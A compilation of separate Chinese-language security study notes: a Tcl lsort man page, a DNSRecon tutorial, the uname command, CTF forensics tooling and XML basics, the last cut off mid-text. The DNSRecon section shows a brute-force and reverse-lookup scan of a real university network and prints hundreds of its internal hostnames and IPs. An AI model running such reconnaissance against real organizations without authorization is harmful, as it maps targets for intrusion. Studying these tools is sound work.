\fBlsort\fR only control what sort of comparison is used, and do not necessarily constrain what the values themselves actually are. This distinction is only noticeable when the list to be sorted has fewer than two elements. .PP The \fBlsort\fR command is reentrant, meaning it is safe to use as part of the implementation of a command used in the \fB\-command\fR option. .SH "范例 EXAMPLES" .PP Sorting a list using ASCII sorting: .CS % lsort {a10 B2 b1 a1 a2} B2 a1 a10 a2 b1 .CE .PP Sorting a list using Dictionary sorting: .CS % lsort -dictionary {a10 B2 b1 a1 a2} a1 a2 a10 b1 B2 .CE .PP Sorting lists of integers: .CS % lsort -integer {5 3 1 2 11 4} 1 2 3 4 5 11 % lsort -integer {1 2 0x5 7 0 4 -1} -1 0 1 2 4 0x5 7 .CE .PP Sorting lists of floating-point numbers: .CS % lsort -real {5 3 1 2 11 4} 1 2 3 4 5 11 % lsort -real {.5 0.07e1 0.4 6e-1} 0.4 .5 6e-1 0.07e1 .CE .PP Sorting using indices: .CS % # Note the space character before the c % lsort {{a 5} { c 3} {b 4} {e 1} {d 2}} { c 3} {a 5} {b 4} {d 2} {e 1} % lsort -index 0 {{a 5} { c 3} {b 4} {e 1} {d 2}} {a 5} {b 4} { c 3} {d 2} {e 1} % lsort -index 1 {{a 5} { c 3} {b 4} {e 1} {d 2}} {e 1} {d 2} { c 3} {b 4} {a 5} .CE .PP Stripping duplicate values using sorting: .CS % lsort -unique {a b c a b c a b c} a b c .CE .PP More complex sorting using a comparison function: .CS % proc compare {a b} { set a0 [lindex $a 0] set b0 [lindex $b 0] if {$a0 < $b0} { return -1 } elseif {$a0 > $b0} { return 1 } return [string compare [lindex $a 1] [lindex $b 1]] } % lsort -command compare \\ {{3 apple} {0x2 carrot} {1 dingo} {2 banana}} {1 dingo} {2 banana} {0x2 carrot} {3 apple} .CE .SH "参见 SEE ALSO" lappend(n), lindex(n), linsert(n), list(n), llength(n), lrange(n), lreplace(n), lsearch(n) .SH "关键字 KEYWORDS" element, list, order, sort .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/09/06 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
--- title: DNSRecon categories: Information Gathering tags: [kali linux,dnsrecon,information gathering,recon,dns] date: 2016-10-21 06:00:00 --- 0x00 DNSRecon介绍 ------------- DNSRecon提供一下功能: ```plain 检查域传送的所有NS记录 枚举给定域的一般DNS记录(MX,SOA,NS,A,AAAA,SPF和TXT) 执行常见的SRV记录枚举,顶级域名(TLD)扩展 支持通配符 蛮力穷举给定一个域和一个域名列表子域和主机A记录和AAAA记录 对给定的IP范围或CIDR执行PTR记录查找 检查DNS服务器A,AAAA和CNAME记录的缓存记录 枚举本地网络中的常见mDNS记录枚举主机并使用Google搜索子域 ``` 工具来源: DNSRecon README [DNSRecon 主页][1] | [Kali DNSRecon Repo仓库][2] - 作者:Carlos Perez - 证书:GPLv2 [DNSRecon视频介绍][3] 0x01 DNSRecon功能 --------------- dnsrecon - 一个强大的DNS枚举脚本 ```shell 选项: -n, --name_server -D, --dictionary -f 过滤掉保存记录时解析为通配符定义的IP地址 root@kali:~# dnsrecon Version: 0.8.10 Usage: dnsrecon.py <options> Options: -h, --help 显示帮助信息并退出 -d, --domain <domain> 枚举的域目标 -r, --range <range> 用于蛮力穷举反向查找IP范围,形式可以为(开始IP-结束IP)或(范围/掩码) -n, --name_server <name> 要使用域服务器,如果没有给定将使用目标的SOA -D, --dictionary <file> 用于蛮力穷举子域和主机名的字典文件。 -f 过滤掉穷举域查找结果,保存记录时解析到通配符定义的IP地址的记录 -t, --type <types> 枚举类型: std 查询SOA,DNS,A,AAAA,MX和SRV记录(如果NS服务器的AXFR请求失败) rvl 反向查找给定CIDR或IP范围 brt 使用给定字典文件蛮力穷举域名和主机 srv SRV记录 axfr 测试所有NS服务器的域传送 goo Google搜索子域和主机 snoop 对给定域的所有NS服务器执行缓存侦听,使用包含域的文件测试所有的服务器, 使用-D选项提供文件 tld 删除给定域的TLD并针对在IANA中注册的所有TLD进行测试 zonewalk 使用NSEC记录执行DNSSEC域漫游 -a 执行AXFR进行标准枚举 -s 使用标准枚举对SPF记录中的IPv4范围执行反向查找。 -g 通过Google搜索执行标准的枚举 -w 在进行标准枚举时,通过Whois执行深度whois记录分析和反向查找IP范围 -z 使用标准枚举形式执行DNSSEC域漫游 --threads <number> 在反向查找,正向查找,强力和SRV记录枚举中使用的线程数 --lifetime <number> 等待服务器响应查询的时间 --db <file> 使用SQLite3文件格式保存找到的记录 --xml <file> 使用XML文件格式保存找到的记录 --iw 继续蛮力穷举域,即使发现通配符记录。 -c, --csv <file> csv格式文件 -j, --json <file> JSON格式文件 -v 在穷举模式中显示尝试详细 ``` <!--more--> 0x02 DNSRecon用法示例 ----------------- ```shell root@kali:~# dnsrecon -d harvard.edu -D /usr/share/wordlists/dnsmap.txt -t std -w --threads=10 --lifetime=20 --xml=test.xml -v [*] Performing General Enumeration of Domain: [-] DNSSEC is not configured for harvard.edu [*] SOA int-dns-2.harvard.edu 128.103.201.105 [*] NS ext-dns-1.harvard.edu 128.103.200.35 [-] Recursion enabled on NS Server 128.103.200.35 [*] NS ext-dns-2.harvard.edu 128.103.200.162 [-] Recursion enabled on NS Server 128.103.200.162 [*] MX mx0b-00171101.pphosted.com 67.231.156.27 [*] A harvard.edu 52.87.36.185 [*] A harvard.edu 52.87.67.209 [*] Enumerating SRV Records [*] SRV _sip._tls.harvard.edu sipdir.online.lync.com 66.119.157.212 443 0 [*] SRV _sip._tls.harvard.edu sipdir.online.lync.com 2603:1047:0:2::b 443 0 [*] SRV _sipfederationtls._tcp.harvard.edu sipfed.online.lync.com 52.113.64.139 5061 0 [*] SRV _sipfederationtls._tcp.harvard.edu sipfed.online.lync.com 2603:1047:0:2::b 5061 0 [*] SRV _h323cs._tcp.harvard.edu vcsecluster01.noc.harvard.edu 128.103.247.202 1720 0 [*] SRV _h323cs._tcp.harvard.edu vcsecluster01.noc.harvard.edu 128.103.247.201 1720 0 [*] SRV _sip._udp.harvard.edu vcsecluster01.noc.harvard.edu no_ip 5060 0 [*] SRV _sips._tcp.harvard.edu harvuni-expe01-sc1.uc.harvard.edu no_ip 5061 10 [*] SRV _sips._tcp.harvard.edu harvuni-expe01-bv1.uc.harvard.edu 63.69.76.6 5061 10 [*] 9 Records Found [*] Performing Whois lookup against records found. [*] The following IP Ranges where found: [*] 0) 128.103.0.0-128.103.255.255 Harvard University [*] 1) 67.231.144.0-67.231.159.255 Proofpoint, Inc. [*] 2) 52.84.0.0-52.95.255.255 Amazon Technologies Inc. [*] 3) 66.119.144.0-66.119.159.255 Microsoft Corporation [*] 4) 52.96.0.0-52.115.255.255 Microsoft Corporation [*] 5) 63.69.76.0-63.69.77.255 Logistics Management Institute [*] What Range do you wish to do a Revers Lookup for? [*] number, comma separated list, a for all or n for none 0 [*] Harvard University [*] Performing Reverse Lookup of range 128.103.0.0-128.103.255.255 [*] Performing Reverse Lookup from 128.103.0.0 to 128.103.255.255 [*] PTR lmagw1-te-7-3-core.nox.org 128.103.0.74 [*] PTR int-dns-3.harvard.edu 128.103.1.5 [*] PTR endrun2-10wa.noc.harvard.edu 128.103.1.6 [*] PTR time.harvard.edu 128.103.1.6 [*] PTR internaldns-b3-n2.harvard.edu 128.103.1.10 [*] PTR internaldns-b3-n2-ha.harvard.edu 128.103.1.11 [*] PTR int-dns-3-node1.harvard.edu 128.103.1.12 [*] PTR int-dns-3-node1-ha.harvard.edu 128.103.1.13 [*] PTR int-dns-3-node2.harvard.edu 128.103.1.14 [*] PTR vpn.noc.harvard.edu 128.103.1.20 [*] PTR vpn5.harvard.edu 128.103.1.20 [*] PTR time.harvard.edu 128.103.1.35 [*] PTR endrun3-10wa.noc.harvard.edu 128.103.1.35 [*] PTR netopc.harvard.edu 128.103.1.37 [*] PTR registration.noc.harvard.edu 128.103.1.38 [*] PTR registration-10wa.noc.harvard.edu 128.103.1.38 [*] PTR usedby-reg10wa.noc.harvard.edu 128.103.1.39 [*] PTR new-netopc.harvard.edu 128.103.1.40 [*] PTR test.noc.harvard.edu 128.103.1.42 [*] PTR sms.noc.harvard.edu 128.103.1.44 [*] PTR autoregdev1-10wa.noc.harvard.edu 128.103.1.45 [*] PTR portaldb2.noc.harvard.edu 128.103.1.46 [*] PTR ext2-10wa.noc.harvard.edu 128.103.1.48 [*] PTR portaldb1-10wa.noc.harvard.edu 128.103.1.51 [*] PTR jnc-10wa.noc.harvard.edu 128.103.1.56 [*] PTR rest-dev.noc.harvard.edu 128.103.1.61 [*] PTR cdn-war10.noc.harvard.edu 128.103.1.133 [*] PTR int-dns-3-node1-mgmt.harvard.edu 128.103.1.178 [*] PTR int-dns-3-node2-mgmt.harvard.edu 128.103.1.179 [*] PTR int-dns-1-node2-mgmt.harvard.edu 128.103.1.195 [*] PTR dhcp-1.harvard.edu 128.103.1.210 [*] PTR dhcp-1-node1.harvard.edu 128.103.1.211 [*] PTR dhcp-1-node1-ha.harvard.edu 128.103.1.212 [*] PTR dhcp-1-node2.harvard.edu 128.103.1.213 [*] PTR dhcp-2.harvard.edu 128.103.1.242 [*] PTR dhcp-2-node1.harvard.edu 128.103.1.243 [*] PTR dhcp-2-node1-ha.harvard.edu 128.103.1.244 [*] PTR dhcp-2-node2.harvard.edu 128.103.1.245 [*] PTR dhcp-2-node2-ha.harvard.edu 128.103.1.246 [*] PTR perdita.harvard.edu 128.103.4.2 [*] PTR iceberg.harvard.edu 128.103.4.3 [*] PTR camelot.harvard.edu 128.103.4.4 [*] PTR paradise.harvard.edu 128.103.4.7 [*] PTR intrigue.harvard.edu 128.103.4.8 [*] PTR mikado.harvard.edu 128.103.4.9 [*] PTR olympiad.harvard.edu 128.103.4.10 [*] PTR tempo.harvard.edu 128.103.4.12 [*] PTR peace.harvard.edu 128.103.4.11 [*] PTR tuscany.harvard.edu 128.103.4.16 [*] PTR troika.harvard.edu 128.103.4.21 [*] PTR pilgrim.harvard.edu 128.103.4.23 [*] PTR broadway.harvard.edu 128.103.4.24 [*] PTR gypsy.harvard.edu 128.103.4.25 [*] PTR winnie2.harvard.edu 128.103.4.26 [*] PTR altissimo.harvard.edu 128.103.4.31 [*] PTR pleasure.harvard.edu 128.103.4.32 [*] PTR tamora.harvard.edu 128.103.4.33 [*] PTR prince.harvard.edu 128.103.4.35 [*] PTR polka.harvard.edu 128.103.4.36 [*] PTR blaze.harvard.edu 128.103.4.37 [*] PTR electron.harvard.edu 128.103.4.40 [*] PTR winnie.harvard.edu 128.103.4.42 [*] PTR lady-x.harvard.edu 128.103.4.43 [*] PTR bologna.harvard.edu 128.103.4.44 [*] PTR corylus.harvard.edu 128.103.4.45 [*] PTR rugosa.harvard.edu 128.103.4.47 [*] PTR tabriz.harvard.edu 128.103.4.48 [*] PTR hansa.harvard.edu 128.103.4.49 [*] PTR mundi.harvard.edu 128.103.4.50 [*] PTR dhcp-0155095169-85-a1.client.fas.harvard.edu 128.103.4.67 [*] PTR geophysics.harvard.edu 128.103.5.5 [*] PTR itis-cmnsvc1.cadm.harvard.edu 128.103.6.5 [*] PTR itis-cmnsvc2.cadm.harvard.edu 128.103.6.6 [*] PTR stage-cdn-ox60.noc.harvard.edu 128.103.6.229 ... ...一直在探测,十分钟后 ... [*] PTR uhsmtafw1.net.harvard.edu 128.103.252.18 [*] PTR arngw1.harvard.edu 128.103.252.46 [*] PTR hrca-hrcagw-ser3.harvard.edu 128.103.252.50 [*] PTR chs-nat1.harvard.edu 128.103.252.52 [*] PTR hrca-hrcagw-ser6.harvard.edu 128.103.252.53 [*] PTR hrca-orcvegw-ser1.harvard.edu 128.103.252.54 [*] PTR chs-nat4.harvard.edu 128.103.252.55 [*] PTR sergw1.harvard.edu 128.103.252.58 [*] PTR meeigw1.harvard.edu 128.103.252.68 [*] PTR vpn.hks.harvard.edu 128.103.252.68 [*] PTR cfagw1.harvard.edu 128.103.252.90 [*] PTR hbspgw1.harvard.edu 128.103.252.106 [*] PTR harvard-rec-pcitest.fas.harvard.edu 128.103.252.128 [*] PTR webvpn.hks.harvard.edu 128.103.252.155 [*] PTR idmlbvip-stage.huit.harvard.edu 128.103.252.180 [*] PTR idmlbvip-prod.huit.harvard.edu 128.103.252.181 [*] PTR lock.hks.harvard.edu 128.103.253.5 [*] PTR netapp2.hks.harvard.edu 128.103.253.6 [*] PTR netapp.hks.harvard.edu 128.103.253.7 [*] PTR p-papercut-dc1.hks.harvard.edu 128.103.253.9 [*] PTR ppc.hks.harvard.edu 128.103.253.9 [*] PTR hermia1.hks.harvard.edu 128.103.253.12 [*] PTR hermia2.hks.harvard.edu 128.103.253.13 [*] PTR eecrmapp.hks.harvard.edu 128.103.253.16 [*] PTR fabian.hks.harvard.edu 128.103.253.19 [*] PTR outbound1.hks.harvard.edu 128.103.253.20 [*] PTR outbound2.hks.harvard.edu 128.103.253.21 [*] PTR wsus.hks.harvard.edu 128.103.253.26 [*] PTR cvsearch.hks.harvard.edu 128.103.253.28 [*] PTR exed.hks.harvard.edu 128.103.253.37 [*] PTR fta.hks.harvard.edu 128.103.253.38 [*] PTR budget.hks.harvard.edu 128.103.253.40 [*] PTR appmail.hks.harvard.edu 128.103.253.40 [*] PTR mfe1.hks.harvard.edu 128.103.253.43 [*] PTR quince.hks.harvard.edu 128.103.253.47 [*] PTR smtp.hks.harvard.edu 128.103.253.49 [*] PTR imappop.hks.harvard.edu 128.103.253.49 [*] PTR apps.hks.harvard.edu 128.103.253.50 [*] PTR web.hks.harvard.edu 128.103.253.50 [*] PTR mail.hks.harvard.edu 128.103.253.51 [*] PTR legacy.hks.harvard.edu 128.103.253.51 [*] PTR mfeclg.hks.harvard.edu 128.103.253.51 [*] PTR smtp.hks.harvard.edu 128.103.253.52 [*] PTR p-kitefs-dc1.hks.harvard.edu 128.103.253.53 [*] PTR case.hks.harvard.edu 128.103.253.54 [*] PTR qa.cms.hks.harvard.edu 128.103.253.55 [*] PTR admin.qa.www2.hks.harvard.edu 128.103.253.55 [*] PTR eecrmiis.hks.harvard.edu 128.103.253.55 [*] PTR ksgaccman.harvard.edu 128.103.253.56 [*] PTR ksgsnoopy.hks.harvard.edu 128.103.253.56 [*] PTR innovation.harvard.edu 128.103.253.56 [*] PTR ksgexecprogram.harvard.edu 128.103.253.56 [*] PTR zuckermanfellows.harvard.edu 128.103.253.56 [*] PTR qa.www.hks.harvard.edu 128.103.253.56 [*] PTR cid.harvard.edu 128.103.253.56 [*] PTR hks.harvard.edu 128.103.253.56 [*] PTR www.hks.harvard.edu 128.103.253.56 [*] PTR www.exed.hks.harvard.edu 128.103.253.56 [*] PTR www.democracy.ash.harvard.edu 128.103.253.56 [*] PTR www.zuckermanfellows.harvard.edu 128.103.253.56 [*] PTR www2.hks.harvard.edu 128.103.253.56 [*] PTR ksglist.hks.harvard.edu 128.103.253.56 [*] PTR ksgfiona.hks.harvard.edu 128.103.253.56 [*] PTR ksgvideo.harvard.edu 128.103.253.56 [*] PTR democracy.ash.harvard.edu 128.103.253.56 [*] PTR yak.hks.harvard.edu 128.103.253.59 [*] PTR casper.hks.harvard.edu 128.103.253.61 [*] PTR autodiscover.hks17.harvard.edu 128.103.253.63 [*] PTR autodiscover.hks18.harvard.edu 128.103.253.63 [*] PTR mail.hks.harvard.edu 128.103.253.63 [*] PTR autodiscover.hks.harvard.edu 128.103.253.63 [*] PTR autodiscover.hks16.harvard.edu 128.103.253.63 [*] 17343 Records Found [*] Saving records to XML file: test.xml ``` ![dnsrecon.gif][4] [1]: https://github.com/darkoperator/dnsrecon [2]: http://git.kali.org/gitweb/?p=packages/dnsrecon.git;a=summary [3]: https://asciinema.org/a/31190 [4]: https://www.hackfun.org/usr/uploads/2016/10/789991485.gif
sec-knowleage
Various writeups for the [2020 AppSec-IL CTF](https://appsecil2020.ctf.today/) ([CTFTime Link](https://ctftime.org/event/1152)). Participated as part of the [JCTF team](https://jctf.team/), which came in first! ![](images/top3.png)
sec-knowleage
uname === 打印系统信息。 ## 概要 ```shell uname [OPTION]... ``` ## 主要用途 - 打印机器和操作系统的信息。 - 当没有选项时,默认启用 `-s` 选项。 - 如果给出多个选项或 `-a` 选项时,输出信息按以下字段排序:内核名称 主机名称 内核release 内核版本 机器名称 处理器 硬件平台 操作系统。 ## 选项 ```shell -a, --all 按顺序打印全部信息,如果 -p 和 -i 的信息是未知,那么省略。 -s, --kernel-name 打印内核名称。 -n, --nodename 打印网络节点主机名称。 -r, --kernel-release 打印内核release。 -v, --kernel-version 打印内核版本。 -m, --machine 打印机器名称。 -p, --processor 打印处理器名称。 -i, --hardware-platform 打印硬件平台名称。 -o, --operating-system 打印操作系统名称。 --help 显示帮助信息并退出。 --version 显示版本信息并退出。 ``` ## 返回值 返回0表示成功,返回非0值表示失败。 ## 例子 ```shell # 单独使用uname命令时相当于uname -s [root@localhost ~]# uname Linux ``` ```shell # 查看全部信息 [root@localhost ~]# uname -a Linux localhost 2.6.18-348.6.1.el5 #1 SMP Tue May 21 15:34:22 EDT 2013 i686 i686 i386 GNU/Linux ``` ```shell # 分别列出信息 [root@localhost ~]# uname -m i686 [root@localhost ~]# uname -n localhost [root@localhost ~]# uname -r 2.6.18-4-686 [root@localhost ~]# uname -s Linux [root@localhost ~]# uname -v #1 SMP Tue May 21 15:34:22 EDT 2013 [root@localhost ~]# uname -p i686 [root@localhost ~]# uname -i i386 [root@localhost ~]# uname -o GNU/Linux ``` ### 注意 1. 该命令是`GNU coreutils`包中的命令,相关的帮助信息请查看`man -s 1 uname`,`info coreutils 'uname invocation'`。
sec-knowleage
### 取证隐写前置技术 大部分的 CTF 比赛中,取证及隐写两者密不可分,两者所需要的知识也相辅相成,所以这里也将对两者一起介绍。 任何要求检查一个静态数据文件从而获取隐藏信息的都可以被认为是隐写取证题(除非单纯地是密码学的知识),一些低分的隐写取证又常常与古典密码学结合在一起,而高分的题目则通常用与一些较为复杂的现代密码学知识结合在一起,很好地体现了 Misc 题的特点。 ### 取证隐写前置技术前置技能 - 了解常见的编码 能够对文件中出现的一些编码进行解码,并且对一些特殊的编码(Base64、十六进制、二进制等)有一定的敏感度,对其进行转换并得到最终的 flag。 - 能够利用脚本语言(Python 等)去操作二进制数据 - 熟知常见文件的文件格式,尤其是各类 [文件头](https://en.wikipedia.org/wiki/List_of_file_signatures)、协议、结构等 - 灵活运用常见的工具 ### Python 操作二进制数据的struct 模块 有的时候需要用 Python 处理二进制数据,比如,存取文件,socket 操作时。这时候,可以使用 Python 的 struct 模块来完成。 struct 模块中最重要的三个函数是 `pack()`、`unpack()` 和 `calcsize()` - `pack(fmt, v1, v2, ...)` 按照给定的格式(fmt),把数据封装成字符串(实际上是类似于c结构体的字节流) - `unpack(fmt, string)` 按照给定的格式(fmt)解析字节流 string,返回解析出来的 tuple - `calcsize(fmt)` 计算给定的格式(fmt)占用多少字节的内存 这里打包格式 `fmt` 确定了将变量按照什么方式打包成字节流,其包含了一系列的格式字符串。这里就不再给出不同格式字符串的含义了,详细细节可以参照 [Python Doc](https://docs.python.org/2/library/struct.html) ```python >>> import struct >>> struct.pack('>I',16) '\x00\x00\x00\x10' ``` `pack` 的第一个参数是处理指令,`'>I'` 的意思是:`>` 表示字节顺序是 Big-Endian,也就是网络序,`I` 表示 4 字节无符号整数。 后面的参数个数要和处理指令一致。 读入一个 BMP 文件的前 30 字节,文件头的结构按顺序如下 - 两个字节:`BM` 表示 Windows 位图,`BA` 表示 OS/2 位图 - 一个 4 字节整数:表示位图大小 - 一个 4 字节整数:保留位,始终为 0 - 一个 4 字节整数:实际图像的偏移量 - 一个 4 字节整数:Header 的字节数 - 一个 4 字节整数:图像宽度 - 一个 4 字节整数:图像高度 - 一个 2 字节整数:始终为 1 - 一个 2 字节整数:颜色数 ```python >>> import struct >>> bmp = '\x42\x4d\x38\x8c\x0a\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00\x00\x00\x80\x02\x00\x00\x68\x01\x00\x00\x01\x00\x18\x00' >>> struct.unpack('<ccIIIIIIHH',bmp) ('B', 'M', 691256, 0, 54, 40, 640, 360, 1, 24) ``` ### Python 操作二进制数据关于bytearray 字节数组介绍 将文件以二进制数组形式读取 ```python data = bytearray(open('challenge.png', 'rb').read()) ``` 字节数组就是可变版本的字节 ```python data[0] = '\x89' ``` ## Python 操作二进制数据的常用工具 [010 Editor](http://www.sweetscape.com/010editor/) SweetScape 010 Editor 是一个全新的十六进位文件编辑器,它有别于传统的十六进位编辑器在于它可用「范本」来解析二进位文件,从而让你读懂和编辑它。它还可用来比较一切可视的二进位文件。 利用它的模板功能可以非常轻松的观察文件内部的具体结构并且依此快速更改内容。 ### 010 Editor中的`file` 命令 `file` 命令根据文件头(魔法字节)去识别一个文件的文件类型。 ```shell root in ~/Desktop/tmp λ file flag flag: PNG image data, 450 x 450, 8-bit grayscale, non-interlaced ``` ### 010 Editor中的`strings` 命令 打印文件中可打印的字符,经常用来发现文件中的一些提示信息或是一些特殊的编码信息,常常用来发现题目的突破口。 - 可以配合 `grep` 命令探测指定信息 ```shell strings test|grep -i XXCTF ``` - 也可以配合 `-o` 参数获取所有 ASCII 字符偏移 ```shell root in ~/Desktop/tmp λ strings -o flag|head 14 IHDR 45 gAMA 64 cHRM 141 bKGD 157 tIME 202 IDATx 223 NFdVK3 361 |;*- 410 Ge%<W 431 5duX@% ``` ### 010 Editor中的`binwalk` 命令 binwalk 本是一个固件的分析工具,比赛中常用来发现多个文件粘合再在一起的情况。根据文件头去识别一个文件中夹杂的其他文件,有时也会存在误报率(尤其是对Pcap流量包等文件时)。 ```shell root in ~/Desktop/tmp λ binwalk flag DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 450 x 450, 8-bit grayscale, non-interlaced 134 0x86 Zlib compressed data, best compression 25683 0x6453 Zip archive data, at least v2.0 to extract, compressed size: 675, uncompressed size: 1159, name: readme.txt 26398 0x671E Zip archive data, at least v2.0 to extract, compressed size: 430849, uncompressed size: 1027984, name: trid 457387 0x6FAAB End of Zip archive ``` 配合 `-e` 参数可以进行自动化提取。 也可以结合 `dd` 命令进行手动切割。 ```shell root in ~/Desktop/tmp λ dd if=flag of=1.zip bs=1 skip=25683 431726+0 records in 431726+0 records out 431726 bytes (432 kB, 422 KiB) copied, 0.900973 s, 479 kB/s ```
sec-knowleage
# XML 学习笔记 --- ## 概述 XML 用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。 XML 无所不在. ```xml <!-- XML声明 --> <?xml version="1.0" encoding="UTF-8"?> <!-- 文档类型定义 --> <!DOCTYPE note[ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> <!-- 文档元素 --> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` --- ### 用途 XML 应用于 Web 开发的许多方面,常用于简化数据的存储和共享。 **XML 把数据从 HTML 分离** 如果你需要在 HTML 文档中显示动态数据,那么每当数据改变时将花费大量的时间来编辑 HTML。 通过 XML,数据能够存储在独立的 XML 文件中。这样你就可以专注于使用 HTML/CSS 进行显示和布局,并确保修改底层数据不再需要对 HTML 进行任何的改变。 通过使用几行 JavaScript 代码,你就可以读取一个外部 XML 文件,并更新你的网页的数据内容。 **XML 简化数据共享** 在真实的世界中,计算机系统和数据使用不兼容的格式来存储数据。 XML 数据以纯文本格式进行存储,因此提供了一种独立于软件和硬件的数据存储方法。 这让创建不同应用程序可以共享的数据变得更加容易。 **XML 简化数据传输** 对开发人员来说,其中一项最费时的挑战一直是在互联网上的不兼容系统之间交换数据。 由于可以通过各种不兼容的应用程序来读取数据,以 XML 交换数据降低了这种复杂性。 **XML 简化平台变更** 升级到新的系统(硬件或软件平台),总是非常费时的。必须转换大量的数据,不兼容的数据经常会丢失。 XML 数据以文本格式存储。这使得 XML 在不损失数据的情况下,更容易扩展或升级到新的操作系统、新的应用程序或新的浏览器。 **XML 使你的数据更有用** 不同的应用程序都能够访问你的数据,不仅仅在 HTML 页中,也可以从 XML 数据源中进行访问。 通过 XML,你的数据可供各种阅读设备使用(掌上计算机、语音设备、新闻阅读器等),还可以供盲人或其他残障人士使用。 **XML 用于创建新的互联网语言** 很多新的互联网语言是通过 XML 创建的。 这里有一些实例: - XHTML - 用于描述可用的 Web 服务 的 WSDL - 作为手持设备的标记语言的 WAP 和 WML - 用于新闻 feed 的 RSS 语言 - 描述资本和本体的 RDF 和 OWL - 用于描述针针对 Web 的多媒体 的 SMIL --- ### XML 和 HTML 之间的差异 XML 和 HTML 为不同的目的而设计: - XML 被设计用来传输和存储数据,其焦点是数据的内容。 - HTML 被设计用来显示数据,其焦点是数据的外观。 XML 不会做任何事情 - HTML 旨在显示信息,而 XML 旨在传输信息,XML 不会做任何事情. 通过 XML 你可以发明自己的标签 - 这是因为 XML 语言没有预定义的标签。 - HTML 中使用的标签都是预定义的。HTML 文档只能使用在 HTML 标准中定义过的标签(如 `<p>`、`<h1>` 等等)。 - XML 允许创作者定义自己的标签和自己的文档结构。 XML 不是对 HTML 的替代 - XML 是对 HTML 的补充。 - XML 不会替代 HTML,理解这一点很重要。在大多数 Web 应用程序中,XML 用于传输数据,而 HTML 用于格式化并显示数据。 --- ## 语法 XML 的语法规则很简单,且很有逻辑。这些规则很容易学习,也很容易使用。 **XML 文档必须有根元素** XML 必须包含根元素,它是所有其他元素的父元素,比如以下实例中 root 就是根元素: ```xml <root> <child> <subchild>.....</subchild> </child> </root> ``` 以下实例中 note 是根元素: ```xml <?xml version="1.0" encoding="UTF-8"?> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` **XML 声明** XML 声明文件的可选部分,如果存在需要放在文档的第一行,如下所示: ```xml <?xml version="1.0" encoding="utf-8"?> ``` 以上实例包含 XML 版本( UTF-8 也是 HTML5, CSS, JavaScript, PHP, 和 SQL 的默认编码。 如果以类似 `<!DOCTYPE note SYSTEM "book.dtd">` 声明的是文档定义类型(DTD:Document Type Definition),DTD 是可选的。 **所有的 XML 元素都必须有一个关闭标签** 在 HTML 中,某些元素不必有一个关闭标签: ```xml <p>This is a paragraph. <br> ``` 在 XML 中,省略关闭标签是非法的。所有元素都必须有关闭标签: ```xml <p>This is a paragraph.</p> <br /> ``` 注释:从上面的实例中,你也许已经注意到 XML 声明没有关闭标签。这不是错误。声明不是 XML 文档本身的一部分,它没有关闭标签。 **XML 标签对大小写敏感** XML 标签对大小写敏感。标签 `<Letter>` 与标签 `<letter>` 是不同的。 必须使用相同的大小写来编写打开标签和关闭标签: ```xml <Message>这是错误的</message> <message>这是正确的</message> ``` 注释:打开标签和关闭标签通常被称为开始标签和结束标签。不论你喜欢哪种术语,它们的概念都是相同的。 **XML 必须正确嵌套** 在 HTML 中,常会看到没有正确嵌套的元素: ```xml <b><i>This text is bold and italic</b></i> ``` 在 XML 中,所有元素都必须彼此正确地嵌套: ```xml <b><i>This text is bold and italic</i></b> ``` 在上面的实例中,正确嵌套的意思是:由于 `<i>` 元素是在 `<b>` 元素内打开的,那么它必须在 `<b>` 元素内关闭。 **XML 属性值必须加引号** 与 HTML 类似,XML 元素也可拥有属性(名称/值的对)。 在 XML 中,XML 的属性值必须加引号。 请研究下面的两个 XML 文档。 第一个是错误的,第二个是正确的: ```xml <note date=12/11/2007> <to>Tove</to> <from>Jani</from> </note> ``` ```xml <note date="12/11/2007"> <to>Tove</to> <from>Jani</from> </note> ``` 在第一个文档中的错误是,note 元素中的 date 属性没有加引号。 **实体引用** 在 XML 中,一些字符拥有特殊的意义。 如果你把字符 "<" 放在 XML 元素中,会发生错误,这是因为解析器会把它当作新元素的开始。 这样会产生 XML 错误: ```xml <message>if salary < 1000 then</message> ``` 为了避免这个错误,请用实体引用来代替 "<" 字符: ```xml <message>if salary &lt; 1000 then</message> ``` 在 XML 中,有 5 个预定义的实体引用: | 实体符号 | 字符 | 含义 | | - | - | - | | &lt; | < | less than | | &gt; | > | greater than | | &amp; | & | ampersand | | &apos; | ' | apostrophe | | &quot; | " | quotation mark | 注释:在 XML 中,只有字符 "<" 和 "&" 确实是非法的。大于号是合法的,但是用实体引用来代替它是一个好习惯。 **XML 中的注释** 在 XML 中编写注释的语法与 HTML 的语法很相似。 ```xml <!-- This is a comment --> ``` **在 XML 中,空格会被保留** HTML 会把多个连续的空格字符裁减(合并)为一个: HTML: ```html Hello Tove ``` 输出结果: ```html Hello Tove ``` 在 XML 中,文档中的空格不会被删减。 **XML 以 LF 存储换行** 在 Windows 应用程序中,换行通常以一对字符来存储:回车符(CR)和换行符(LF)。 在 Unix 和 Mac OSX 中,使用 LF 来存储新行。 在旧的 Mac 系统中,使用 CR 来存储新行。 XML 以 LF 存储换行。 --- ## 树结构 XML 文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。 ```xml <?xml version="1.0" encoding="UTF-8"?> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 第一行是 XML 声明。它定义 XML 的版本(1.0)和所使用的编码(UTF-8 : 万国码, 可显示各种语言)。 下一行描述文档的根元素(像在说:"本文档是一个便签"): ```xml <note> ``` 接下来 4 行描述根的 4 个子元素(to, from, heading 以及 body): ```xml <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> ``` 最后一行定义根元素的结尾: ```xml </note> ``` 你可以假设,从这个实例中,XML 文档包含了一张 Jani 写给 Tove 的便签。 XML 